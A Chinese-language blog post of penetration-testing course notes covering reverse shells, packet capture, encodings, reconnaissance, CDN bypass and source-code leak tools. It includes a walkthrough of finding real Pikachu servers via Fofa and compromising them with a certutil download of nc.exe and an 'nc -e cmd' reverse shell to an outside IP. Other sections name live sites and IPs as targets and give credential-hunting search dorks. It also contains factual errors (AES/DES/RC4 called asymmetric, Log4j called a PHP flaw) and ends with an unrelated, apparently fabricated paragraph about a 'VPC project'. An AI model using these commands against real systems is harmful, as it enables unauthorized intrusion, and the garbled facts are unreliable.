小迪安全_基础

一、专业名词,操作系统,文件下载,反弹shell

image.png

名词解释-渗透测试-漏洞&攻击&后门&代码&专业词

前后端,
POC: 验证代码 判断是否存在漏洞
EXP: 利用代码 (一般关注)
Payload: 漏洞利用管道 载荷
Shellcode:漏洞利用代码 与exp类似
后门:统称
Webshell:web后门
木马 : 控制电脑
病毒: 破坏电脑
反弹:权限反弹,移交到其地方
回显
跳板
黑盒测试:不知道源代码,具体情况
黑盒测试: 知道源代码,大概情况 去测试
暴力破解:
社会工程学:社工 人为攻击
撞库: 用已知的库 去试其他平台的密码等
ATT&CK : 红蓝对抗的框架 攻击行为的官方名字

参考:
https://www.cnblogs.com/sunny11/p/13583083.html 名词解释
https://forum.ywhack.com/bountytips.php?download 攻击工具命令等集合
https://forum.ywhack.com/reverse-shell/
https://blog.csdn.net/weixin_43303273/article/details/83029138 常用Linux cmd shell 命令

操作系统-用途&命令&权限&用户&防火墙

1、个人计算机 iwin10 11 &服务器用机 win2016 2012 centos ubuntu
2、Windows&Linux 常见命令
https://blog.csdn.net/weixin_43303273/article/details/83029138 常用Linux cmd shell 命令
3、文件权限&服务权限&用户权限等
4、系统用户&用户组&服务用户等分类
5、自带防火墙出站&入站规则策略协议

案例 1:文件上传下载-解决无图形化&解决数据传输
Linux:wget curl 或python ruby perl java 环境等

Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32 等
https://forum.ywhack.com/bountytips.php?download

案例 2:反弹 Shell 命令-解决数据回显&解决数据通讯
useradd 用户名 passwd 用户名
测试 Linux 系统添加用户或修改密码命令交互回显问题

#结合案例 1:防火墙绕过-正向连接&反向连接&内网服务器
1、内网: 内网 -> xiaodi8
xiaodi8 !-> 内网
2、防火墙: xiaodi8 <-> aliyun
xiaodi8 防火墙 -> aliyun
aliyun !-> xiaodi8 防火墙
正向连接&反向连接 :自己主动连接,自己被动连接 ,看以谁为参照
nc -c cmd 42.43.222.222 5566 nc -lvvp 5566 因为防火墙出站检测宽松 ,进站检测严格

#结合案例 2:学会了有手就行-Fofa 拿下同行 Pikachu 服务器 文件下载&反弹 Shell:
fofa搜索"pikachu" && country="CN" && title=="Get the pikachu"
找到目标网站的rce 命令执行漏洞
ipconfig/ifconfig 产看是Windows还是Linux 拼接下载nc命令 给目标服务器下载nc 工具
certutil -urlcache -split -f http://www.xiaodi8.com/nc.exe
拼接nc命令nc.exe nc -e cmd 47.75.212.155 5566
自己服务器47.75.212.155监听5566端口
获取权限

nc 使用
https://www.cnblogs.com/nmap/p/6148306.html
https://www.sqlsec.com/2019/10/nc.html

二、 Web 应用&架构搭建&漏洞&HTTP 数据包&代理服务器

image.png
1、网站搭建前置知识
2、WEB应用环境架构类
3、WEB应用安全漏洞分类
4、WEB请求返回过程数据包
#网站搭建前置知识
域名,子域名,DNS,HTTP/HTTPS,证书等

WEB应用环境架构类
理解不同WEB应用组成角色功能架构:
开发语言,程序源码,中间件容器,数据库类型,服务器操作系统,第三方软件等
开发语言:asp,php,aspx,jsp,java,python,ruby,go,html,javascript等
程序源码:根据开发语言分类;应用类型分类;开源CMS分类;开发框架分类等
中间件容器:lS,Apache,Nginx,Tomcat,Neblogic,Jboos,glasshfish等
数据库类型:Access,Mysq,Mssql,Oracle,db2,Sybase,Redis,MongoDB等
服务器操作系统:Windows系列,Linux系列,Mac系列等
第三方软件:phpmyadmin,vs-ftpd,vNC,ELK,Openssh等

#WEB应用安全漏洞分类 出现在源码层面
SQL注入,文件安全,RCE执行,XSS跨站,CSRF/SSRF/CRLF,
反序列化,逻辑越权,未授权访问,XXE/ML,弱口令安全等

WEB请求返回过程数据包参考:
https://www.jianshu.com/p/558455228c43
https://www.cnblogs.com/cherrycui/p/10815465.html
请求数据包,请求方法,请求体,响应包,响应头,状态码,代理服务器等
Request,Response,User-Agent,Cookie,Server,Content-Length等

image.png

架构-Web应用搭建-域名源码解析
请求包-新闻回帖点赞-重放数据包
请求包-移动端&PC访问-自定义UA头
返回包-网站文件目录扫描-返回状态码
数据包-WAF文件目录扫描-代理服务器

本机监听虚拟机 要设置本机IP地址代理

三、 抓包&封包&协议&APP&小程序&PC 应用&WEB 应用

image.png
#知识点:
1、抓包技术应用意义
2、抓包技术应用对象
3、抓包技术应用协议
4、抓包技术应用支持
5、封包技术应用意义
总结点:学会不同对象采用不同抓包封包抓取技术分析

基于网络接口抓包-网络接口
基于程序进程抓包-程序进程
基于数据协议抓包-HTTP/S&TCP&UDP
基于应用对象抓包-APP&小程序&PCU川
基于系统使用抓包-模拟器&WIN&LINUX
基于应用对象封包-WPE动作数据包重放通讯

#参考点:

  1. Fiddler:是一个http协议调试代理工具,它能够记录并检查所有你的电脑和互联网之间的http通讯,设置断点,查看所有的“进出"Fiddler的数据(指cookie,html,js,css等文件)。Fiddler要比其他的网络调试器要更加简单,因为它不仅仅暴露http通讯还提供了一个用户友好的格式。
  2. Charles:是一个HTTP代理服务器,HTTP监视器,反转代理服务器,当浏览器连接Charles的代理访问互联网时,Charles可以监控浏览器发送和接收的所有数据。它允许一个开发者查看所有连接互联网的HTTP通信,这些包括request,response和HTTP headers(包含cookies与caching信息)。
  3. TCPDump:是可以将网络中传送的数据包完全截获下来提供分析。它支持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。
  4. BurpSuite:是用于攻击web应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP消息、持久性、认证、代理、日志、警报。
  5. Wireshark:是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包,并尽可能显示出最为详细的网络封包资料。Vireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。 不走web协议的数据包 用wireshark
  6. 科来网络分析系统:是一款由科来软件全自主研发,并拥有全部知识产品的网络分析产品。该系统具有行业领先的专家分析技术,通过捕获并分析网络中传输的底层数据包,对网络故障、网络安全以及网络性能进行全面分析,从而快速排查网络中出现或潜在的故障、安全及性能问题。
  7. WPE&封包分析:是强大的网络封包编辑器,wpe可以截取网络上的信息,修改封包数据,是外挂制作的常用工具。一般在安全测试中可用来调试数据通讯地址。

WEB应用站点操作数据抓包-浏览器审查查看元素网络监听
APP&小程序&PC抓包HTTP/S数据-Charles&Fiddlere&Burpsuite
程序进程&网络接口&其他协议抓包-WireSharke&科来网络分析系统
通讯类应用封包分析发送接收-WPE四件套封包&科来网络分析系统
有的应用不走web协议 就用wpe & 科来

#环境配置:
1、安卓模拟器安装搭建
逍遥,雷电,夜神等自行百度下载安装
2、工具相关证书安装指南
Charles
https://blog.csdn.net/weixin_45459427/article/details/108393878
Fidder
https://blog.csdn.net/weixin 45043349/article/details/120088449
BurpSuite
https://blog.csdn.net/qq_36658099/article/details/81487491
3、封包抓取调试见课程操作

为什么要抓包?抓包应用的资产信息进行安全测试
2、抓包对象有那些?-小程序,APP桌面应用等
3、抓包协议区别工具?有部分应用不走HTTP/S,需要用到全局协议抓包
4、封包和抓包不同之处?-零散整体的区别,封包能精确到每个操作的数据包

四、30 余种加密编码进制&Web&数据库&系统&代码&参数值

#知识点:
存储密码加密-Web&数据库&系统
传输数据编码-各类组合传输参数值
代码特性加密-JS&PHP&NET&AVA
数据显示编码字符串数据显示编码

#本课意义:
1.了解加密编码进制在安全测试中的存在
2.掌握常见的加密解密编码解码进制互转的操作
3.了解常见的加密解密编码解密进制互转的影响
旨在解决类似疑问,提供思路:
你是否碰到不知道的加密方式?
你是否碰到无法找到的解密平台?
你是否碰到不知道如何解密的字符串?
你是否准备参加CTF比赛补充此类知识点?

#详细点:
密码存储加密:
MD5 SHA1 NTLM AES DES RC4
MD5值是32或16位位由数字"0-9"和字母"a-f"所组成的字符串 不可逆,解密网站采取枚举的方法解密
SHA1这种加密的密文特征跟MD5差不多,只不过位数是40
NTLM这种加密是Windows的哈希密码,标准通讯安全协议
AES,DES,RC4这些都是非对称性加密算法,引入密钥,密文特征与Base64类似
应用场景:各类应用密文,自定义算法,代码分析,CTF安全比赛等

传输数据编码:
BASE64 URL HEX ASCII
BASE64值是由数字"0-9"和字母"a-f"所组成的字符串,大小写敏感,结尾通常有符号= 密文长度随密码长度变化 密码长加密后就长
UL编码是由数字"0-9"和字母"a-f"所组成的字符串,大小写敏感,通常以%数字字母间隔
HEX编码是计算机中数据的一种表示方法,将数据进行十六进制转换,它由0-9,A-F,组成
ASCI编码是将128个字符进行进制数来表示,常见ASCII码表大小规则:09<AZ<aZ
举例:
个人博客-URL解码
国外WEB-BASE64解码
搜孤视频-BASE64解码
应用场景:参数传递(如注入影响),后期WF绕过干扰写法应用,视频地址还原等

JS前端代码加密:防止代码不被二次开发
JS颜文字 jother JSFUCK
颜文字特征:一堆颜文字构成的js代码,在F12中可直接解密执行
jother特征:只用!+()[]{}这八个字符就能完成对任意字符串的编码。也可在F12中解密执行
SFUCK特征:与jother很像,只是少了{}
后端代码加密:
PHP .NET JAVA
PHP:乱码,头部有信息
.NET:DL封装代码文件
JAVA:JAR&CLASS文件
举例:Zend ILSpy IDEA
应用场景:版权代码加密,开发特性,CTF比赛等

数据库密文加密:
MYSQL MSSQL等
数据显示编码:
UTF-8GBK2312等

识别算法编码类型:

  1. 看密文位数
  2. 看密文的特征(数字,字母,大小写,符号等)
  3. 看当前密文存在的地方(Web,数据库,操作系统等应用)

案例
Web-ZZCMS-密文-MD5
Web-Discuz-密文-MD5&Salt
系统-Windows-密文-NTLM&HASH
综合-参数-密文传输-AES&BASE64
代码-解密-解密反编译-Zend&Dll&Jar
CT℉赛题-buuoj–single dog-JS颜文字
CTF赛题-xuenixiang-Jsfuck-JSFUCK

#补充点:
1.常见加密编码进制等算法解析
MD5,SHA,ASC,进制,时间戳,URL,BASE64,Unescape,AES,DES等
2.常见加密编码形式算法解析
直接加密,带sat,带密码,带偏移,带位数,带模式,带干扰,自定义组合等
3.常见解密解码方式(针对)
枚举,自定义逆向算法,可逆向
4.常见加密解码算法的特性
长度位数,字符规律,代码分析,搜索获取等

#拓展补充参考资料:
部分资源:
https://www.cmd5.com
http://tmxk.org/jother
http://www.jsfuck.com
http://www.hiencode.com
http://tool.chacuo.net/cryptaes
https://utf-8.jp/public/aaencode.html

1.30余种加密编码类型的密文特征分析(建议收藏)
https://mp.weixin.qq.com/s?biz=MzAwNDCXMjl2MA==&mid=2247484455&idx=1&sn=e1b4324ddcf7d6
123be30d9a5613e17b&chksm:=9b26f60cac517f1a920cf3b73b3212a645aeef78882c47957b9f3c2135cb7ce
051c73fe77bb2&mpshare=1&scene=23&srcid=1111auAYWmr1NONAs9Wp2hGz&sharer_sharetime=1605
145141579&sharer_shareid=5051b3eddbbe2cb698aedf9452370026#rd
2.CTF中常见密码题解密网站总结(建议收藏)
https://blog.csdn.net/qq_41638851/article/details/100526839
3.CTF密码学常见加密解密总结(建议收藏)
https://blog.csdn.net/qq_40837276/article/details/83080460

五、 资产架构&端口&应用&CDN&WAF&站库分离&负载均衡

image.png

#知识点:
资产架构-端口&目录&插件接口&多站点&多应用
番外安全-域名&服务器本身&服务厂商&管理人员
考虑阻碍-站库分离&CDN&WAF&负载均衡&主机防护
#详细点:
1、前置条件-购买使用-云服务器&域名等
2、架构搭建-目录&端口&子域&插件&应用等
3、安全部署WAF防火墙&主机防护&HIDS等
4、性能优化-负载均衡&CDN加速&OSS云存储等

资产架构-BT搭建&多站点&多插件&多应用等
番外安全-Aliyun&域名解析&云服务器&个人等
考虑阻碍-站库分离&部署防护&负载均衡&CDN等

#资产架构:
WEB单个源码指向安全
WEB多个目录源码安全

image.png
WEB多个端口源码安全
image.png
服务器架设多个站点安全
image.png
架设第三方插件接口安全
image.png
服务器架设多个应用安全
image.png

#番外安全:
基于域名解析安全:服务器和域名不同平台购买,获取到购买域名平台的账号密码
基于服务器本身安全:远程连接
基于服务商信息安全
基于管理个人的安全
案例
师上)
端口类:
https://imap.dmu.edu.cn/
http://imap.dmu.edu.cn:8080/
第三方类:
http:/139.129.92.146/
http://139.129.92.146:8081/ 安装了phpmyadmin插件

http://139.59.9.234/ 安装了ftp服务
ftp139.59.9.234 可直接连接

#考虑阻碍:
阻碍-站库分离 数据库放到其他服务器
阻碍-CDN加速服务
阻碍-负载均衡服务 多台服务器
阻碍-WAF应用防火墙
阻碍-主机防护防火墙

六、Web 架构篇&域名&语言&中间件&数据库&系统&源码获取

image.png
#知识点:
1、打点-Web架构-语言&中间件&数据库&系统等
2、打点-Wb源码-CMS开源&闭源售卖&自主研发等
3、打点-Web源码获取-泄露安全&资源监控&其他等
4、打点-Web域名-子域名&相似域名&反查域名&旁注等
#信息点:
基础信息,系统信息,应用信息,防护信息,人员信息,其他信息等
#技术点:
CMS识别,端口扫描,CDN绕过,源码获取,子域名查询,WAF识别,负载均衡识别等

演示案例

  1. 信息打点-个人博客-KIAODI8-架构&源码

基础信息: 浏览器网络检查 响应包 可能包含
image.png apache +php +z-blog
操作系统判断 url 大小写判断 (不能断定) windows 大小写不敏感 Linux 敏感 不要在参数后判断(?id=xxx) 要在文件名后缀判断(www.xiaodi8.com/index.PHp) 或ping 地址 ttl值接近多少 每个操作系统ttl值不同 或nmap 也会有
数据库和中间件判断:常见搭建组合 或端口扫描 mysql3306 sqlserver 1433 oracle1521 redis 6379
源码-直接利用公开的漏洞库尝试安全测试
源码-白盒代码审计挖漏洞
mysql漏洞或弱口令等
php常规的漏洞如log4j

  1. 信息打点-某违法APP-面具约会-架构&源码

bp抓包 nginx php url大小写 Windows 端口扫描 3306 mysql数据库
源码
黑灰产源码网站 互站网 www.huzhan.com 或bing google 搜关键字源码

  1. 信息打点-某违法应用-爱心工程-架构&域名

www.axgc168.com

www.jmls.com
www.jmlsd.cn
jmlsd.cn
资源名变WWW
变动imlsd jmlsd1238
变动com net cn org

  1. 信息打点-某专属SRC-补天平台-架构&域名

七、 资产泄漏&CMS 识别&Git 监控&SVN&DS_Store&备份

image.png
#知识点:
CMS指纹识别源码获取方式
习惯&配置&特性等获取方式
托管资产平台资源搜索监控
#详细点:
参考:https://www.secpulse.com/archives/,124398.html
源码泄漏原因:
1、从源码本身的特性入口
2、从管理员不好的习惯入口
3、从管理员不好的配置入口
4、从管理员不好的意识入口
5、从管理员资源信息搜集入口

源码泄漏集合:
composer.json 针对php
git源码泄露
svn源码泄露
hg源码泄漏
网站备份压缩文件
WEB-NF/web.xml泄露
DS Store文件泄露
SWP文件泄露
CVS泄露
Bzr泄露
GitHub源码泄漏、 针对所有

演示案例:

  1. 直接获取-CMS识别-云悉指纹识别平台
  2. 习惯不好-备份文件-某黑阔博客源码泄漏

备份案例:
http://www.h0r2yc.com/1.zip (无了) 网站备份文件
用工具扫描 7kbscan

image.png
在网站根目录下一级备份会被扫到
同级目录不容易被扫到

  1. 配置不当-GIT泄漏-某程序员博客源码泄漏

github gitee

image.png
https://github.com/lijiejie/GitHack
G引T案例:
http:/121.36.49.234/.git/
D:\Python27\python.exe GitHack.py http://121.36.49.234/.git/
image.png

  1. 配置不当-SVN泄漏-某国外小伙子源码泄漏

image.png
SVN案例:
http://trafficbonus.com/.svn/entries
python SvnHack.py -u http://trafficbonus.com/.svn/entries–download
image.png

  1. 配置不当-DS_Store泄漏-某开发Mac源码泄漏

image.png
image.png

  1. PHP特性-composer.json泄漏-某直接搭建源码泄漏

image.png

23456 是针对识别不出cms的情况

  1. 下载配合-WEB-INF泄露-RoarCTF-2019-EasyJava

image.png

  1. 资源监控-GITHUB泄漏-语法搜索&关键字搜索&社工(*)

0、博客资源中邮箱等关键字
www.xiaodi8.com 浏览器监听network
js ,css文件 泄露 域名 qq 等

image.png
到geihub 搜索 可能会有源码等 默认信息 邮箱 等
管理员邮箱等 在GitHub搜索,可能会有相关代码

1、渊龙Sec安全团队
http://blog.aabyss.cn/ GitHub 搜索 aabyss
2、群成员花佬的信息Norah C.IV

相关利用项目:
cMS识别:htps:/www.yunsee.cn/
备份:敏感目录文件扫描-7 kbscan-WebPathBrute
CVS:https://github.com/kost/dvcs-ripper
GIT:https://github.com/lijiejie/GitHack
SVN:https://github.com/callmefeifei/SvnHack
DS_Store:https://github.com/lijiejie/ds_store_exp

GITHUB资源搜索:
in:name test #仓库标题搜索含有关键字
in:descripton test #仓库描述搜索含有关键字
in:readme test #Readme文件搜素含有关键字
stars:>3000 test #stars数量大于3000的搜索关键字
stars:1000…3000 test #stars数量大于1000小于3000的搜索关键字
forks:>1000 test #forks数量大于1000的搜索关键字
forks:1000…3000 test #forks数量大于1000小于3000的搜索关键字size:>=5000 test #指定仓库大于5000k(5M)的搜索关键字pushed:>2019-02-12 test #发布时间大于2019-02-12的搜索关键字created:>2019-02-12test #创建时间大于2019-02-12的搜索关键字user:test #用户名搜素
license:apache-2.0 test #明确仓库的LICENSE搜索关键字
language:java test #在java语言的代码中搜索关键字
user:test in:name test #组合搜索,用户名test的标题含有test的
关键字配合谷歌搜索:
site:Github.com smtp
site:Github.com smtp @qq.com
site:Github.com smtp @126.com
site:Github.com smtp @163.com
site:Github.com smtp @sina.com.cn
site:Github.com smtp password
site:Github.com String password smtp

八、系统篇&端口扫描&CDN 服务&负载均衡&WAF 防火墙

image.png

#知识点:
1、获取网络信息-服务厂商&网络架构

image.png
image.png
探测不到 内网信息

2、获取服务信息-应用协议&内网资产
ftp ssh redis
其他网段
目标:171.40.78.83
网段:171.40.78.1-255
已取得:171.40.78.99
内网攻击安全测试手段

3、获取阻碍信息-CDN&WAF&负载&防火墙
waf识别 错误信息会有提示页面

#详细点:
CDN服务,WAF防火墙,负载均衡,防火墙阻碍?

演示案例:
网络信息获取-服务厂商&网终架构

image.png
171.40.78.0/24
服务信息获取-协议应用&内网资产 端口
阻碍信息获取-CDN&WAF&负载&防火墙
防火墙与内网大相关

#相关利用项目:
Masscan:https://github.com/robertdavidgraham/masscan 端口扫描
WafwoOf:https://github.com/EnableSecurity/wafw00f waf识别工具
python main.py www.tn2000.com
Kali上自带Nmap,Masscan,lbd等项目,超级ping:ping.chinaz.com

超级ping:cDN服务识别
Masscan:端口扫描,应用协议
Wafw00f:Web应用防护防火墙识别
Nmap:端口扫描,应用协议,防火墙识别
bd:负载均衡,广域网负载均衡,应用层负载均衡

image.png
lbd 识别负载均衡
image.png

#端口协议安全: https://www.se7ensec.cn/2018/11/28/%E7%AB%AF%E5%8F%A3%E6%B8%97%E9%80%8F%E6%80%BB%E7%BB%93/

九、 CDN 绕过篇&漏洞回链&接口探针&全网扫描&反向邮件

image.png

#知识点:
0、CDN知识-工作原理及阻碍
1、CDN配置-域名&区域&类型
全球IDC IP库 备案信息查询 域名查询whois
2、CDN绕过-靠谱十余种技战法
3、CDN绑定-HOSTS绑定指向访问

image.png
image.png
绑定真实IP 后 做安全测试会会直接走真实IP 不走cdn节点
一定是真实IP 绑定节点IP 网站也能正常访问

演示案例:
真实应用-CDN绕过-漏洞&遗留文件

image.png
image.png
image.png

真实应用-CDN绕过-子域名查询操作

image.png
真实应用-CDN绕过-接口查询国外访问
国外请求:https:/tools.ipip.net/cdn.php
接口查询:https:/get-site-ip.com/

真实应用-CDN绕过-主动邮件配合备案
激活用户 找回密码 注册等
墨者image.png

image.png

真实应用-CDN绕过-全网扫描FuckCDN

#前置知识:
1.传统访问:用户访问域名->解析服务器P->访问日标主机
2.普通CDN:用户访问域名->CDN节点->真实服务器P->访问日标主机
3.带WAF的CDN:用户访问域名->CDN节点(WAF)->真实服务器IP->访问日标主机

#CDN配置:
配置1:加速域名-需要启用加速的域名
配置2:加速区域需要启用加速的地区
配置3:加速类型-需要启用加速的资源

#判定标准:
nslookup,.各地ping(出现多个IP即启用CDN服务)
#参考知识:
https://zhuanlan.zhihu.com/p/33440472 cdn 绕过
https://www.cnblogs.com/blacksunny/p/5771827.html
子域名,去掉www,邮件服务器,国外访问,证书查询,APP抓包
黑暗空间引擎,通过漏洞或泄露获取,扫全网,以量打量,第三方接口查询等

#案例资源:
超级Ping:https:/www.17ce.com/
接口查询:https:/get-site-ip.com/
国外请求:https:/tools.ipip.net/cdn.php
全网扫描:https:/github.com/Tai7sy/fuckcdn

十、 APP&小程序篇&抓包封包&XP 框架&反编译&资产提取

image.png

#知识点:
小程序-外在-资产收集
APP-外在&内在-资产收集

演示案例:
APP-外在抓包-Fd&茶杯&Bup
APP-外在封包-封包监听工具
APP-内在提取-AppInfoScanner

image.png
image.png
或安卓修改大师

APP-内在搜索-反编译载入DEA
APP资源提取-安装包&资源文件
APP-框架使用-Xposed&cJustTrustMe
小程序微信-电脑版登录启动抓包分析

十一、 红队工具篇&Fofa&Quake&Kunyu&Suize 水泽&Arl 灯塔

image.png

#知识点:
1、网络空间四大引擎-Fofa&Quake&Shodan&Zoomeye
2、自动化信息收集项目-ARL灯塔&Suize水泽&Kunyu坤舆
3、单点功能信息收集项目-企查&子域名&指纹识别&社工信息

#黑暗引擎:
https://fofa.so
https://quake.360.cn
https://www.shodan.io
https://www.zoomeye.org
关联资产-特征资产一资产信息

#自动项目:
https://github.com/knownsec/Kunyu
https://github.com/0x727/ShuiZe_0x727
https://github.com/TophantTechnology/ARL
#相关资源:
https://forum.ywhack.com/center.php

演示案例:
网络空间-Fofa&Quake&Shodan&Zoomeye
工具测评网络空间-四大黑暗引擎集合版项目
https://github.com/s7ckTeam/Glass
工具测评-自动化收集-ARL灯塔&Suize水泽&Kunyu
工具测评-单点功能器-企查&子域名&指纹识别&社工

  • 3
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
小迪安全是一家网络安全公司,致力于提供云安全解决方案。其中,VPC(Virtual Private Cloud)项目是他们的一项实战项目。 VPC项目旨在帮助客户构建安全可靠的云基础架构。VPC提供了一种虚拟化的网络环境,客户可以在其中创建和管理自己的虚拟私有网络。这个网络与其他云资源隔离,并且可以按需自定义网络拓扑、IP地址范围、子网等。 在该实战项目中,小迪安全为客户提供全方位的VPC解决方案。首先,他们与客户合作,进行需求分析和规划,根据客户的业务需求和安全要求定制VPC架构。其次,小迪安全就架构设计给出详细的实施方案,并协助客户在云平台上搭建VPC环境。他们会根据实际情况,对网络拓扑、VPC子网、路由、安全组等进行优化配置,确保网络的灵活性和安全性。 在VPC项目的实施过程中,小迪安全注重安全性。他们会使用防火墙、虚拟专线等技术手段,保障VPC网络的安全防护。同时,他们也提供监控和日志管理等工具,帮助客户实时监测和管理VPC网络的运行状态。 小迪安全的VPC项目实战已经成功服务了多家客户。通过他们的专业能力和经验,客户得以构建高度安全可靠的云基础架构,并且在日常运维中得到专业的支持和保障。 总结来说,小迪安全的VPC项目实战是为客户提供安全可靠的云基础架构解决方案。他们通过需求分析、架构设计、优化配置和安全防护等步骤,帮助客户构建和管理VPC网络,以保障云环境的稳定和安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值